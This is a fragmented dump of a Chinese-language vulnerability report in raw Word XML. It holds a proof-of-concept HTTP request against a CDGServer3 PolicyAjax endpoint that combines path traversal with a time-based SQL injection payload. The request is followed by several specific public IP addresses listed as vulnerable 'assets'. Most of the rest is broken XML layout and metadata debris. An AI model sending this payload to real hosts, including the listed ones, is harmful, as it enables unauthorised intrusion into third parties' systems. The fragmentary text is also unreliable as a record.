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Poc：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POST /CDGServer3/dojojs/../PolicyAjax HTTP/1.1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Host: xxx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Pragma: no-cache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Cache-Control: no-cache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Upgrade-Insecure-Requests: 1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: JSESSIONID=DDF82C502C19FEB58EEF8E0AD153EC57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Connection: close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Content-Type: application/x-www-form-urlencoded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Content-Length: 64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command=selectOption&amp;id=-999';waitfor delay '0:0:5'--+&amp;type=JMCL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资产一：121.57.233.121:8090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3888105"/>
            <wp:effectExtent l="0" t="0" r="952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2966085"/>
            <wp:effectExtent l="0" t="0" r="1016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资产二：http://183.6.51.19:8090/</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="1016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资产三：http://219.157.192.34:8090/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="1016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486"/>
        </w:tabs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资产四：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://219.157.192.34:8090/</w:t>
      </w:r>
    </w:p>
    <w:p/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1016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FiYmU0YTg3NDNmZjE2MWZjMzZkODA0ODE3NTQ2YTIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="4EB73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2024-03-12T14:58:42Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-12T15:06:48Z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17A2D63A63DA49EFABD3B1336E4FB476_12</vt:lpwstr>
  </property>
</Properties>
</file>